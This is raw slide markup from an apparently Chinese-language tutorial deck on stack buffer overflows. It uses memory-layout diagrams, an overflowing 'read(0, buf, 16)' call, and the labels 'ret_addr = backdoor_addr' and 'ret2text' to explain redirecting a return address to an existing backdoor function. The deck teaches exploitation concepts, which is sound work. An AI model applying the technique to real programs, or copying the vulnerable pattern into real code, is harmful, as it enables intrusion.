                <a:spcPts val="0"/>
              </a:spcAft>
              <a:buNone/>
            </a:pPr>
            <a:r>
              <a:rPr lang="en-US" sz="1200" dirty="0">
                <a:solidFill>
                  <a:schemeClr val="dk1"/>
                </a:solidFill>
                <a:latin typeface="Consolas"/>
                <a:ea typeface="Consolas"/>
                <a:cs typeface="Consolas"/>
                <a:sym typeface="Consolas"/>
              </a:rPr>
              <a:t>read(0, </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" sz="1200" dirty="0" err="1">
                <a:solidFill>
                  <a:schemeClr val="dk1"/>
                </a:solidFill>
                <a:latin typeface="Consolas"/>
                <a:ea typeface="Consolas"/>
                <a:cs typeface="Consolas"/>
                <a:sym typeface="Consolas"/>
              </a:rPr>
              <a:t>buf</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" sz="1200" dirty="0">
                <a:solidFill>
                  <a:schemeClr val="dk1"/>
                </a:solidFill>
                <a:latin typeface="Consolas"/>
                <a:ea typeface="Consolas"/>
                <a:cs typeface="Consolas"/>
                <a:sym typeface="Consolas"/>
              </a:rPr>
              <a:t>, 16);   </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" sz="1200" dirty="0">
                <a:solidFill>
                  <a:schemeClr val="dk1"/>
                </a:solidFill>
                <a:latin typeface="Consolas"/>
                <a:ea typeface="Consolas"/>
                <a:cs typeface="Consolas"/>
                <a:sym typeface="Wingdings" panose="05000000000000000000" pitchFamily="2" charset="2"/>
              </a:rPr>
              <a:t></a:t>
            </a:r>
            <a:endParaRPr sz="1200" dirty="0">
              <a:solidFill>
                <a:schemeClr val="dk1"/>
              </a:solidFill>
              <a:latin typeface="Consolas"/>
              <a:ea typeface="Consolas"/>
              <a:cs typeface="Consolas"/>
              <a:sym typeface="Consolas"/>
            </a:endParaRPr>
          </a:p>
          <a:p>
            <a:pPr marL="0" lvl="0" indent="0" rtl="0">
              <a:lnSpc>
                <a:spcPct val="115000"/>
              </a:lnSpc>
              <a:spcBef>
                <a:spcPts val="0"/>
              </a:spcBef>
              <a:spcAft>
                <a:spcPts val="0"/>
              </a:spcAft>
              <a:buNone/>
            </a:pPr>
            <a:r>
              <a:rPr lang="en" sz="1200" dirty="0">
                <a:solidFill>
                  <a:schemeClr val="dk1"/>
                </a:solidFill>
                <a:latin typeface="Consolas"/>
                <a:ea typeface="Consolas"/>
                <a:cs typeface="Consolas"/>
                <a:sym typeface="Consolas"/>
              </a:rPr>
              <a:t>}</a:t>
            </a:r>
          </a:p>
        </p:txBody>
      </p:sp>
      <p:cxnSp>
        <p:nvCxnSpPr>
          <p:cNvPr id="52" name="直接箭头连接符 51">
            <a:extLst>
              <a:ext uri="{FF2B5EF4-FFF2-40B4-BE49-F238E27FC236}">
                <a16:creationId xmlns:a16="http://schemas.microsoft.com/office/drawing/2014/main" id="{BB4F9DDA-2062-41E2-B29A-352B00F54906}"/>
              </a:ext>
            </a:extLst>
          </p:cNvPr>
          <p:cNvCxnSpPr>
            <a:cxnSpLocks/>
            <a:stCxn id="34" idx="2"/>
            <a:endCxn id="47" idx="0"/>
          </p:cNvCxnSpPr>
          <p:nvPr/>
        </p:nvCxnSpPr>
        <p:spPr>
          <a:xfrm>
            <a:off x="4056947" y="3519152"/>
            <a:ext cx="0" cy="708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F2D2E9AD-C011-483F-87F8-DDA863C32FCE}"/>
              </a:ext>
            </a:extLst>
          </p:cNvPr>
          <p:cNvSpPr txBox="1"/>
          <p:nvPr/>
        </p:nvSpPr>
        <p:spPr>
          <a:xfrm>
            <a:off x="4317147" y="3683561"/>
            <a:ext cx="3315010" cy="369332"/>
          </a:xfrm>
          <a:prstGeom prst="rect">
            <a:avLst/>
          </a:prstGeom>
          <a:noFill/>
        </p:spPr>
        <p:txBody>
          <a:bodyPr wrap="none" rtlCol="0">
            <a:spAutoFit/>
          </a:bodyPr>
          <a:lstStyle/>
          <a:p>
            <a:r>
              <a:rPr lang="zh-CN" altLang="en-US" dirty="0">
                <a:latin typeface="微软雅黑 Light" panose="020B0502040204020203" pitchFamily="34" charset="-122"/>
                <a:ea typeface="微软雅黑 Light" panose="020B0502040204020203" pitchFamily="34" charset="-122"/>
              </a:rPr>
              <a:t>输入：</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" altLang="zh-CN" dirty="0">
                <a:latin typeface="微软雅黑 Light" panose="020B0502040204020203" pitchFamily="34" charset="-122"/>
                <a:ea typeface="微软雅黑 Light" panose="020B0502040204020203" pitchFamily="34" charset="-122"/>
              </a:rPr>
              <a:t>AAAABBBBCCCCDDDD</a:t>
            </a:r>
            <a:endParaRPr lang="zh-CN" altLang="en-US" dirty="0">
              <a:latin typeface="微软雅黑 Light" panose="020B0502040204020203" pitchFamily="34" charset="-122"/>
              <a:ea typeface="微软雅黑 Light" panose="020B0502040204020203" pitchFamily="34" charset="-122"/>
            </a:endParaRPr>
          </a:p>
        </p:txBody>
      </p:sp>
      <p:sp>
        <p:nvSpPr>
          <p:cNvPr id="55" name="Shape 650">
            <a:extLst>
              <a:ext uri="{FF2B5EF4-FFF2-40B4-BE49-F238E27FC236}">
                <a16:creationId xmlns:a16="http://schemas.microsoft.com/office/drawing/2014/main" id="{922F5A2B-BAA9-4911-B65E-E35FB23619DF}"/>
              </a:ext>
            </a:extLst>
          </p:cNvPr>
          <p:cNvSpPr/>
          <p:nvPr/>
        </p:nvSpPr>
        <p:spPr>
          <a:xfrm>
            <a:off x="2465955" y="5130172"/>
            <a:ext cx="3181983" cy="287478"/>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AAAA</a:t>
            </a:r>
            <a:endParaRPr dirty="0"/>
          </a:p>
        </p:txBody>
      </p:sp>
      <p:sp>
        <p:nvSpPr>
          <p:cNvPr id="21" name="矩形 20">
            <a:extLst>
              <a:ext uri="{FF2B5EF4-FFF2-40B4-BE49-F238E27FC236}">
                <a16:creationId xmlns:a16="http://schemas.microsoft.com/office/drawing/2014/main" id="{56F136B0-BD15-4B67-8EB9-C4EEC188F73C}"/>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ret2text</a:t>
            </a:r>
          </a:p>
        </p:txBody>
      </p:sp>
    </p:spTree>
    <p:extLst>
      <p:ext uri="{BB962C8B-B14F-4D97-AF65-F5344CB8AC3E}">
        <p14:creationId xmlns:p14="http://schemas.microsoft.com/office/powerpoint/2010/main" val="8258753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id="{A93B0BAB-2F16-46A9-97CC-90D4C00E5091}"/>
              </a:ext>
            </a:extLst>
          </p:cNvPr>
          <p:cNvGrpSpPr/>
          <p:nvPr/>
        </p:nvGrpSpPr>
        <p:grpSpPr>
          <a:xfrm>
            <a:off x="6426558" y="399245"/>
            <a:ext cx="3883021" cy="6246254"/>
            <a:chOff x="4584879" y="992499"/>
            <a:chExt cx="5738969" cy="5601480"/>
          </a:xfrm>
        </p:grpSpPr>
        <p:grpSp>
          <p:nvGrpSpPr>
            <p:cNvPr id="5" name="Shape 624">
              <a:extLst>
                <a:ext uri="{FF2B5EF4-FFF2-40B4-BE49-F238E27FC236}">
                  <a16:creationId xmlns:a16="http://schemas.microsoft.com/office/drawing/2014/main" id="{82B9289E-73FE-49AF-B6F4-0900DF5D5FC8}"/>
                </a:ext>
              </a:extLst>
            </p:cNvPr>
            <p:cNvGrpSpPr/>
            <p:nvPr/>
          </p:nvGrpSpPr>
          <p:grpSpPr>
            <a:xfrm>
              <a:off x="4584879" y="992499"/>
              <a:ext cx="5738969" cy="5601480"/>
              <a:chOff x="4897550" y="888136"/>
              <a:chExt cx="1363200" cy="3620439"/>
            </a:xfrm>
          </p:grpSpPr>
          <p:sp>
            <p:nvSpPr>
              <p:cNvPr id="6" name="Shape 625">
                <a:extLst>
                  <a:ext uri="{FF2B5EF4-FFF2-40B4-BE49-F238E27FC236}">
                    <a16:creationId xmlns:a16="http://schemas.microsoft.com/office/drawing/2014/main" id="{66B570F3-A096-4B70-BE99-92F5DB78D599}"/>
                  </a:ext>
                </a:extLst>
              </p:cNvPr>
              <p:cNvSpPr/>
              <p:nvPr/>
            </p:nvSpPr>
            <p:spPr>
              <a:xfrm>
                <a:off x="4897550" y="888136"/>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For Kernel</a:t>
                </a:r>
                <a:endParaRPr>
                  <a:solidFill>
                    <a:srgbClr val="FFFFFF"/>
                  </a:solidFill>
                </a:endParaRPr>
              </a:p>
            </p:txBody>
          </p:sp>
          <p:sp>
            <p:nvSpPr>
              <p:cNvPr id="7" name="Shape 626">
                <a:extLst>
                  <a:ext uri="{FF2B5EF4-FFF2-40B4-BE49-F238E27FC236}">
                    <a16:creationId xmlns:a16="http://schemas.microsoft.com/office/drawing/2014/main" id="{6B2C601E-D1C3-428E-AEAC-1E25E4FDE7A8}"/>
                  </a:ext>
                </a:extLst>
              </p:cNvPr>
              <p:cNvSpPr/>
              <p:nvPr/>
            </p:nvSpPr>
            <p:spPr>
              <a:xfrm>
                <a:off x="4897550" y="1162336"/>
                <a:ext cx="1363200" cy="532702"/>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8" name="Shape 627">
                <a:extLst>
                  <a:ext uri="{FF2B5EF4-FFF2-40B4-BE49-F238E27FC236}">
                    <a16:creationId xmlns:a16="http://schemas.microsoft.com/office/drawing/2014/main" id="{2417D00D-B973-4A6F-B7B9-5A3DDEB7F146}"/>
                  </a:ext>
                </a:extLst>
              </p:cNvPr>
              <p:cNvSpPr/>
              <p:nvPr/>
            </p:nvSpPr>
            <p:spPr>
              <a:xfrm>
                <a:off x="4897550" y="1695037"/>
                <a:ext cx="1363200" cy="345399"/>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Shape 628">
                <a:extLst>
                  <a:ext uri="{FF2B5EF4-FFF2-40B4-BE49-F238E27FC236}">
                    <a16:creationId xmlns:a16="http://schemas.microsoft.com/office/drawing/2014/main" id="{07A56EF6-4FB8-4E94-A5C1-50DF5761DCB0}"/>
                  </a:ext>
                </a:extLst>
              </p:cNvPr>
              <p:cNvSpPr/>
              <p:nvPr/>
            </p:nvSpPr>
            <p:spPr>
              <a:xfrm>
                <a:off x="4897550" y="2040436"/>
                <a:ext cx="1363200" cy="44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shared libraries</a:t>
                </a:r>
                <a:endParaRPr/>
              </a:p>
            </p:txBody>
          </p:sp>
          <p:sp>
            <p:nvSpPr>
              <p:cNvPr id="10" name="Shape 629">
                <a:extLst>
                  <a:ext uri="{FF2B5EF4-FFF2-40B4-BE49-F238E27FC236}">
                    <a16:creationId xmlns:a16="http://schemas.microsoft.com/office/drawing/2014/main" id="{707381BE-9F57-472D-A9D6-4B032B784029}"/>
                  </a:ext>
                </a:extLst>
              </p:cNvPr>
              <p:cNvSpPr/>
              <p:nvPr/>
            </p:nvSpPr>
            <p:spPr>
              <a:xfrm>
                <a:off x="4897550" y="2483236"/>
                <a:ext cx="1363200" cy="410861"/>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 name="Shape 630">
                <a:extLst>
                  <a:ext uri="{FF2B5EF4-FFF2-40B4-BE49-F238E27FC236}">
                    <a16:creationId xmlns:a16="http://schemas.microsoft.com/office/drawing/2014/main" id="{97B8DF59-E4C5-4FD2-A237-586D621D29B3}"/>
                  </a:ext>
                </a:extLst>
              </p:cNvPr>
              <p:cNvSpPr/>
              <p:nvPr/>
            </p:nvSpPr>
            <p:spPr>
              <a:xfrm>
                <a:off x="4897550" y="2894098"/>
                <a:ext cx="1363200" cy="274195"/>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Heap</a:t>
                </a:r>
                <a:endParaRPr dirty="0"/>
              </a:p>
            </p:txBody>
          </p:sp>
          <p:sp>
            <p:nvSpPr>
              <p:cNvPr id="12" name="Shape 631">
                <a:extLst>
                  <a:ext uri="{FF2B5EF4-FFF2-40B4-BE49-F238E27FC236}">
                    <a16:creationId xmlns:a16="http://schemas.microsoft.com/office/drawing/2014/main" id="{E931A1D2-481B-4BB9-891B-84E7E8BCFE3C}"/>
                  </a:ext>
                </a:extLst>
              </p:cNvPr>
              <p:cNvSpPr/>
              <p:nvPr/>
            </p:nvSpPr>
            <p:spPr>
              <a:xfrm>
                <a:off x="4897550" y="3361338"/>
                <a:ext cx="1363200" cy="274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Data</a:t>
                </a:r>
                <a:endParaRPr/>
              </a:p>
            </p:txBody>
          </p:sp>
          <p:sp>
            <p:nvSpPr>
              <p:cNvPr id="13" name="Shape 632">
                <a:extLst>
                  <a:ext uri="{FF2B5EF4-FFF2-40B4-BE49-F238E27FC236}">
                    <a16:creationId xmlns:a16="http://schemas.microsoft.com/office/drawing/2014/main" id="{9893FB29-F450-49FA-BC66-8C71333CB434}"/>
                  </a:ext>
                </a:extLst>
              </p:cNvPr>
              <p:cNvSpPr/>
              <p:nvPr/>
            </p:nvSpPr>
            <p:spPr>
              <a:xfrm>
                <a:off x="4897550" y="3635538"/>
                <a:ext cx="1363200" cy="598837"/>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4" name="Shape 633">
                <a:extLst>
                  <a:ext uri="{FF2B5EF4-FFF2-40B4-BE49-F238E27FC236}">
                    <a16:creationId xmlns:a16="http://schemas.microsoft.com/office/drawing/2014/main" id="{81F4E38F-7208-4D9C-B943-2280EFFD6742}"/>
                  </a:ext>
                </a:extLst>
              </p:cNvPr>
              <p:cNvSpPr/>
              <p:nvPr/>
            </p:nvSpPr>
            <p:spPr>
              <a:xfrm>
                <a:off x="4897550" y="4234375"/>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Unused</a:t>
                </a:r>
                <a:endParaRPr>
                  <a:solidFill>
                    <a:srgbClr val="FFFFFF"/>
                  </a:solidFill>
                </a:endParaRPr>
              </a:p>
            </p:txBody>
          </p:sp>
          <p:cxnSp>
            <p:nvCxnSpPr>
              <p:cNvPr id="15" name="Shape 634">
                <a:extLst>
                  <a:ext uri="{FF2B5EF4-FFF2-40B4-BE49-F238E27FC236}">
                    <a16:creationId xmlns:a16="http://schemas.microsoft.com/office/drawing/2014/main" id="{2B56582F-1891-49BA-9F55-08C133B125D1}"/>
                  </a:ext>
                </a:extLst>
              </p:cNvPr>
              <p:cNvCxnSpPr>
                <a:cxnSpLocks/>
                <a:stCxn id="8" idx="0"/>
              </p:cNvCxnSpPr>
              <p:nvPr/>
            </p:nvCxnSpPr>
            <p:spPr>
              <a:xfrm>
                <a:off x="5579150" y="1695037"/>
                <a:ext cx="0" cy="109299"/>
              </a:xfrm>
              <a:prstGeom prst="straightConnector1">
                <a:avLst/>
              </a:prstGeom>
              <a:noFill/>
              <a:ln w="9525" cap="flat" cmpd="sng">
                <a:solidFill>
                  <a:schemeClr val="dk2"/>
                </a:solidFill>
                <a:prstDash val="solid"/>
                <a:round/>
                <a:headEnd type="none" w="med" len="med"/>
                <a:tailEnd type="triangle" w="med" len="med"/>
              </a:ln>
            </p:spPr>
          </p:cxnSp>
          <p:cxnSp>
            <p:nvCxnSpPr>
              <p:cNvPr id="16" name="Shape 635">
                <a:extLst>
                  <a:ext uri="{FF2B5EF4-FFF2-40B4-BE49-F238E27FC236}">
                    <a16:creationId xmlns:a16="http://schemas.microsoft.com/office/drawing/2014/main" id="{18EAAC46-FCCD-4964-980A-AAFF78D1D986}"/>
                  </a:ext>
                </a:extLst>
              </p:cNvPr>
              <p:cNvCxnSpPr>
                <a:cxnSpLocks/>
                <a:stCxn id="11" idx="0"/>
              </p:cNvCxnSpPr>
              <p:nvPr/>
            </p:nvCxnSpPr>
            <p:spPr>
              <a:xfrm flipV="1">
                <a:off x="5579150" y="2559899"/>
                <a:ext cx="4460" cy="334199"/>
              </a:xfrm>
              <a:prstGeom prst="straightConnector1">
                <a:avLst/>
              </a:prstGeom>
              <a:noFill/>
              <a:ln w="9525" cap="flat" cmpd="sng">
                <a:solidFill>
                  <a:schemeClr val="dk2"/>
                </a:solidFill>
                <a:prstDash val="solid"/>
                <a:round/>
                <a:headEnd type="none" w="med" len="med"/>
                <a:tailEnd type="triangle" w="med" len="med"/>
              </a:ln>
            </p:spPr>
          </p:cxnSp>
        </p:grpSp>
        <p:sp>
          <p:nvSpPr>
            <p:cNvPr id="29" name="Shape 631">
              <a:extLst>
                <a:ext uri="{FF2B5EF4-FFF2-40B4-BE49-F238E27FC236}">
                  <a16:creationId xmlns:a16="http://schemas.microsoft.com/office/drawing/2014/main" id="{F82D5E77-3B99-4ED7-9D49-E74A5C908844}"/>
                </a:ext>
              </a:extLst>
            </p:cNvPr>
            <p:cNvSpPr/>
            <p:nvPr/>
          </p:nvSpPr>
          <p:spPr>
            <a:xfrm>
              <a:off x="4584879" y="1844876"/>
              <a:ext cx="5738969" cy="251142"/>
            </a:xfrm>
            <a:prstGeom prst="rect">
              <a:avLst/>
            </a:prstGeom>
            <a:solidFill>
              <a:srgbClr val="E4808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dirty="0" err="1">
                  <a:solidFill>
                    <a:schemeClr val="tx1">
                      <a:lumMod val="65000"/>
                      <a:lumOff val="35000"/>
                    </a:schemeClr>
                  </a:solidFill>
                </a:rPr>
                <a:t>ret_addr</a:t>
              </a:r>
              <a:r>
                <a:rPr lang="en-US" altLang="zh-CN" dirty="0">
                  <a:solidFill>
                    <a:schemeClr val="tx1">
                      <a:lumMod val="65000"/>
                      <a:lumOff val="35000"/>
                    </a:schemeClr>
                  </a:solidFill>
                </a:rPr>
                <a:t> = </a:t>
              </a:r>
              <a:r>
                <a:rPr lang="en-US" altLang="zh-CN" dirty="0" err="1">
                  <a:solidFill>
                    <a:schemeClr val="tx1">
                      <a:lumMod val="65000"/>
                      <a:lumOff val="35000"/>
                    </a:schemeClr>
                  </a:solidFill>
                </a:rPr>
                <a:t>backdoor_addr</a:t>
              </a:r>
              <a:endParaRPr dirty="0">
                <a:solidFill>
                  <a:schemeClr val="tx1">
                    <a:lumMod val="65000"/>
                    <a:lumOff val="35000"/>
                  </a:schemeClr>
                </a:solidFill>
              </a:endParaRPr>
            </a:p>
          </p:txBody>
        </p:sp>
      </p:grpSp>
      <p:sp>
        <p:nvSpPr>
          <p:cNvPr id="31" name="文本框 30">
            <a:extLst>
              <a:ext uri="{FF2B5EF4-FFF2-40B4-BE49-F238E27FC236}">
                <a16:creationId xmlns:a16="http://schemas.microsoft.com/office/drawing/2014/main" id="{66390BC5-F328-44DF-B6AE-7DBFD4626842}"/>
              </a:ext>
            </a:extLst>
          </p:cNvPr>
          <p:cNvSpPr txBox="1"/>
          <p:nvPr/>
        </p:nvSpPr>
        <p:spPr>
          <a:xfrm>
            <a:off x="10467614" y="1017485"/>
            <a:ext cx="858835" cy="369332"/>
          </a:xfrm>
          <a:prstGeom prst="rect">
            <a:avLst/>
          </a:prstGeom>
          <a:noFill/>
        </p:spPr>
        <p:txBody>
          <a:bodyPr wrap="square" rtlCol="0">
            <a:spAutoFit/>
          </a:bodyPr>
          <a:lstStyle/>
          <a:p>
            <a:r>
              <a:rPr lang="en-US" altLang="zh-CN" dirty="0"/>
              <a:t>Stack</a:t>
            </a:r>
            <a:endParaRPr lang="zh-CN" altLang="en-US" dirty="0"/>
          </a:p>
        </p:txBody>
      </p:sp>
      <p:sp>
        <p:nvSpPr>
          <p:cNvPr id="32" name="文本框 31">
            <a:extLst>
              <a:ext uri="{FF2B5EF4-FFF2-40B4-BE49-F238E27FC236}">
                <a16:creationId xmlns:a16="http://schemas.microsoft.com/office/drawing/2014/main" id="{22386C21-3C35-4D7A-8DE1-7548ACAA8C4B}"/>
              </a:ext>
            </a:extLst>
          </p:cNvPr>
          <p:cNvSpPr txBox="1"/>
          <p:nvPr/>
        </p:nvSpPr>
        <p:spPr>
          <a:xfrm>
            <a:off x="10555224" y="5471183"/>
            <a:ext cx="683616" cy="369332"/>
          </a:xfrm>
          <a:prstGeom prst="rect">
            <a:avLst/>
          </a:prstGeom>
          <a:noFill/>
        </p:spPr>
        <p:txBody>
          <a:bodyPr wrap="square" rtlCol="0">
            <a:spAutoFit/>
          </a:bodyPr>
          <a:lstStyle/>
          <a:p>
            <a:r>
              <a:rPr lang="en-US" altLang="zh-CN" dirty="0"/>
              <a:t>Text</a:t>
            </a:r>
            <a:endParaRPr lang="zh-CN" altLang="en-US" dirty="0"/>
          </a:p>
        </p:txBody>
      </p:sp>
      <p:cxnSp>
        <p:nvCxnSpPr>
          <p:cNvPr id="34" name="连接符: 肘形 33">
            <a:extLst>
              <a:ext uri="{FF2B5EF4-FFF2-40B4-BE49-F238E27FC236}">
                <a16:creationId xmlns:a16="http://schemas.microsoft.com/office/drawing/2014/main" id="{9D4EB105-A862-43D0-B8CE-5D59E5E670DC}"/>
              </a:ext>
            </a:extLst>
          </p:cNvPr>
          <p:cNvCxnSpPr>
            <a:cxnSpLocks/>
            <a:stCxn id="29" idx="1"/>
            <a:endCxn id="39" idx="1"/>
          </p:cNvCxnSpPr>
          <p:nvPr/>
        </p:nvCxnSpPr>
        <p:spPr>
          <a:xfrm rot="10800000" flipV="1">
            <a:off x="6426556" y="1489762"/>
            <a:ext cx="3" cy="4262596"/>
          </a:xfrm>
          <a:prstGeom prst="bentConnector3">
            <a:avLst>
              <a:gd name="adj1" fmla="val 7620100000"/>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Shape 628">
            <a:extLst>
              <a:ext uri="{FF2B5EF4-FFF2-40B4-BE49-F238E27FC236}">
                <a16:creationId xmlns:a16="http://schemas.microsoft.com/office/drawing/2014/main" id="{FAB87570-AA3A-41C6-9354-F57105467229}"/>
              </a:ext>
            </a:extLst>
          </p:cNvPr>
          <p:cNvSpPr/>
          <p:nvPr/>
        </p:nvSpPr>
        <p:spPr>
          <a:xfrm>
            <a:off x="6426556" y="4335166"/>
            <a:ext cx="3883021" cy="339816"/>
          </a:xfrm>
          <a:prstGeom prst="rect">
            <a:avLst/>
          </a:prstGeom>
          <a:solidFill>
            <a:schemeClr val="accent1">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Bss</a:t>
            </a:r>
            <a:endParaRPr dirty="0"/>
          </a:p>
        </p:txBody>
      </p:sp>
      <p:sp>
        <p:nvSpPr>
          <p:cNvPr id="39" name="Shape 631">
            <a:extLst>
              <a:ext uri="{FF2B5EF4-FFF2-40B4-BE49-F238E27FC236}">
                <a16:creationId xmlns:a16="http://schemas.microsoft.com/office/drawing/2014/main" id="{6CA77EA5-89D3-4070-BA8F-BF1776AF1CFF}"/>
              </a:ext>
            </a:extLst>
          </p:cNvPr>
          <p:cNvSpPr/>
          <p:nvPr/>
        </p:nvSpPr>
        <p:spPr>
          <a:xfrm>
            <a:off x="6426555" y="5612333"/>
            <a:ext cx="3883021" cy="280050"/>
          </a:xfrm>
          <a:prstGeom prst="rect">
            <a:avLst/>
          </a:prstGeom>
          <a:solidFill>
            <a:srgbClr val="E4808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dirty="0">
                <a:solidFill>
                  <a:schemeClr val="tx1">
                    <a:lumMod val="65000"/>
                    <a:lumOff val="35000"/>
                  </a:schemeClr>
                </a:solidFill>
              </a:rPr>
              <a:t>backdoor</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" dirty="0">
                <a:solidFill>
                  <a:schemeClr val="tx1">
                    <a:lumMod val="65000"/>
                    <a:lumOff val="35000"/>
                  </a:schemeClr>
                </a:solidFill>
              </a:rPr>
              <a:t> in ELF</a:t>
            </a:r>
            <a:endParaRPr dirty="0">
              <a:solidFill>
                <a:schemeClr val="tx1">
                  <a:lumMod val="65000"/>
                  <a:lumOff val="35000"/>
                </a:schemeClr>
              </a:solidFill>
            </a:endParaRPr>
          </a:p>
        </p:txBody>
      </p:sp>
      <p:sp>
        <p:nvSpPr>
          <p:cNvPr id="3" name="文本框 2">
            <a:extLst>
              <a:ext uri="{FF2B5EF4-FFF2-40B4-BE49-F238E27FC236}">
                <a16:creationId xmlns:a16="http://schemas.microsoft.com/office/drawing/2014/main" id="{57D519EE-BF54-4641-887A-627D5353173E}"/>
              </a:ext>
            </a:extLst>
          </p:cNvPr>
          <p:cNvSpPr txBox="1"/>
          <p:nvPr/>
        </p:nvSpPr>
        <p:spPr>
          <a:xfrm>
            <a:off x="1193067" y="2769256"/>
            <a:ext cx="3065161"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篡改栈帧上的返回地址为程序中已有的后门函数</a:t>
            </a:r>
          </a:p>
        </p:txBody>
      </p:sp>
      <p:sp>
        <p:nvSpPr>
          <p:cNvPr id="24" name="矩形 23">
            <a:extLst>
              <a:ext uri="{FF2B5EF4-FFF2-40B4-BE49-F238E27FC236}">
                <a16:creationId xmlns:a16="http://schemas.microsoft.com/office/drawing/2014/main" id="{E8DF81C6-7849-475A-BAB9-9D552070BB04}"/>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ret2text</a:t>
            </a:r>
          </a:p>
        </p:txBody>
      </p:sp>
    </p:spTree>
    <p:extLst>
      <p:ext uri="{BB962C8B-B14F-4D97-AF65-F5344CB8AC3E}">
        <p14:creationId xmlns:p14="http://schemas.microsoft.com/office/powerpoint/2010/main" val="3843072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6F542C06-4F84-45F8-A155-C9C1CA996953}"/>
              </a:ext>
            </a:extLst>
          </p:cNvPr>
          <p:cNvGrpSpPr/>
          <p:nvPr/>
        </p:nvGrpSpPr>
        <p:grpSpPr>
          <a:xfrm>
            <a:off x="6763447" y="602355"/>
            <a:ext cx="3883027" cy="5653289"/>
            <a:chOff x="4584869" y="992499"/>
            <a:chExt cx="5738979" cy="5069724"/>
          </a:xfrm>
        </p:grpSpPr>
        <p:grpSp>
          <p:nvGrpSpPr>
            <p:cNvPr id="4" name="Shape 624">
              <a:extLst>
                <a:ext uri="{FF2B5EF4-FFF2-40B4-BE49-F238E27FC236}">
                  <a16:creationId xmlns:a16="http://schemas.microsoft.com/office/drawing/2014/main" id="{8A8DC2CD-6D8B-473D-BD39-E56AFEDCFDC5}"/>
                </a:ext>
              </a:extLst>
            </p:cNvPr>
            <p:cNvGrpSpPr/>
            <p:nvPr/>
          </p:nvGrpSpPr>
          <p:grpSpPr>
            <a:xfrm>
              <a:off x="4584869" y="992499"/>
              <a:ext cx="5738977" cy="5069724"/>
              <a:chOff x="4897548" y="888136"/>
              <a:chExt cx="1363202" cy="3276746"/>
            </a:xfrm>
          </p:grpSpPr>
          <p:sp>
            <p:nvSpPr>
              <p:cNvPr id="6" name="Shape 625">
                <a:extLst>
                  <a:ext uri="{FF2B5EF4-FFF2-40B4-BE49-F238E27FC236}">
                    <a16:creationId xmlns:a16="http://schemas.microsoft.com/office/drawing/2014/main" id="{529DE509-C2E4-44BB-8BE6-C481AF3FA52E}"/>
                  </a:ext>
                </a:extLst>
              </p:cNvPr>
              <p:cNvSpPr/>
              <p:nvPr/>
            </p:nvSpPr>
            <p:spPr>
              <a:xfrm>
                <a:off x="4897550" y="888136"/>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For Kernel</a:t>
                </a:r>
                <a:endParaRPr>
                  <a:solidFill>
                    <a:srgbClr val="FFFFFF"/>
                  </a:solidFill>
                </a:endParaRPr>
              </a:p>
            </p:txBody>
          </p:sp>
          <p:sp>
            <p:nvSpPr>
              <p:cNvPr id="7" name="Shape 626">
                <a:extLst>
                  <a:ext uri="{FF2B5EF4-FFF2-40B4-BE49-F238E27FC236}">
                    <a16:creationId xmlns:a16="http://schemas.microsoft.com/office/drawing/2014/main" id="{7F13D3A9-59E1-48B7-B88F-AFA6E52583E9}"/>
                  </a:ext>
                </a:extLst>
              </p:cNvPr>
              <p:cNvSpPr/>
              <p:nvPr/>
            </p:nvSpPr>
            <p:spPr>
              <a:xfrm>
                <a:off x="4897550" y="1162336"/>
                <a:ext cx="1363200" cy="532702"/>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8" name="Shape 627">
                <a:extLst>
                  <a:ext uri="{FF2B5EF4-FFF2-40B4-BE49-F238E27FC236}">
                    <a16:creationId xmlns:a16="http://schemas.microsoft.com/office/drawing/2014/main" id="{F9D023FC-2D0D-4160-AE9D-3A16DB1F7623}"/>
                  </a:ext>
                </a:extLst>
              </p:cNvPr>
              <p:cNvSpPr/>
              <p:nvPr/>
            </p:nvSpPr>
            <p:spPr>
              <a:xfrm>
                <a:off x="4897550" y="1695037"/>
                <a:ext cx="1363200" cy="345399"/>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Shape 628">
                <a:extLst>
                  <a:ext uri="{FF2B5EF4-FFF2-40B4-BE49-F238E27FC236}">
                    <a16:creationId xmlns:a16="http://schemas.microsoft.com/office/drawing/2014/main" id="{2EC5BF3E-1C26-460D-BF4F-9870124E7288}"/>
                  </a:ext>
                </a:extLst>
              </p:cNvPr>
              <p:cNvSpPr/>
              <p:nvPr/>
            </p:nvSpPr>
            <p:spPr>
              <a:xfrm>
                <a:off x="4897550" y="2040436"/>
                <a:ext cx="1363200" cy="44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shared libraries</a:t>
                </a:r>
                <a:endParaRPr/>
              </a:p>
            </p:txBody>
          </p:sp>
          <p:sp>
            <p:nvSpPr>
              <p:cNvPr id="10" name="Shape 629">
                <a:extLst>
                  <a:ext uri="{FF2B5EF4-FFF2-40B4-BE49-F238E27FC236}">
                    <a16:creationId xmlns:a16="http://schemas.microsoft.com/office/drawing/2014/main" id="{F78A3CD3-E481-4F8E-BA23-04776A31C3E4}"/>
                  </a:ext>
                </a:extLst>
              </p:cNvPr>
              <p:cNvSpPr/>
              <p:nvPr/>
            </p:nvSpPr>
            <p:spPr>
              <a:xfrm>
                <a:off x="4897550" y="2483236"/>
                <a:ext cx="1363200" cy="410861"/>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 name="Shape 630">
                <a:extLst>
                  <a:ext uri="{FF2B5EF4-FFF2-40B4-BE49-F238E27FC236}">
                    <a16:creationId xmlns:a16="http://schemas.microsoft.com/office/drawing/2014/main" id="{A3C36562-15E1-44F3-A275-54744B61749F}"/>
                  </a:ext>
                </a:extLst>
              </p:cNvPr>
              <p:cNvSpPr/>
              <p:nvPr/>
            </p:nvSpPr>
            <p:spPr>
              <a:xfrm>
                <a:off x="4897550" y="2891581"/>
                <a:ext cx="1363200" cy="276712"/>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Heap</a:t>
                </a:r>
                <a:endParaRPr dirty="0"/>
              </a:p>
            </p:txBody>
          </p:sp>
          <p:sp>
            <p:nvSpPr>
              <p:cNvPr id="12" name="Shape 631">
                <a:extLst>
                  <a:ext uri="{FF2B5EF4-FFF2-40B4-BE49-F238E27FC236}">
                    <a16:creationId xmlns:a16="http://schemas.microsoft.com/office/drawing/2014/main" id="{6286BDDF-878B-4830-8C97-41E0EAD0356C}"/>
                  </a:ext>
                </a:extLst>
              </p:cNvPr>
              <p:cNvSpPr/>
              <p:nvPr/>
            </p:nvSpPr>
            <p:spPr>
              <a:xfrm>
                <a:off x="4897548" y="3338736"/>
                <a:ext cx="1363200" cy="274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Data</a:t>
                </a:r>
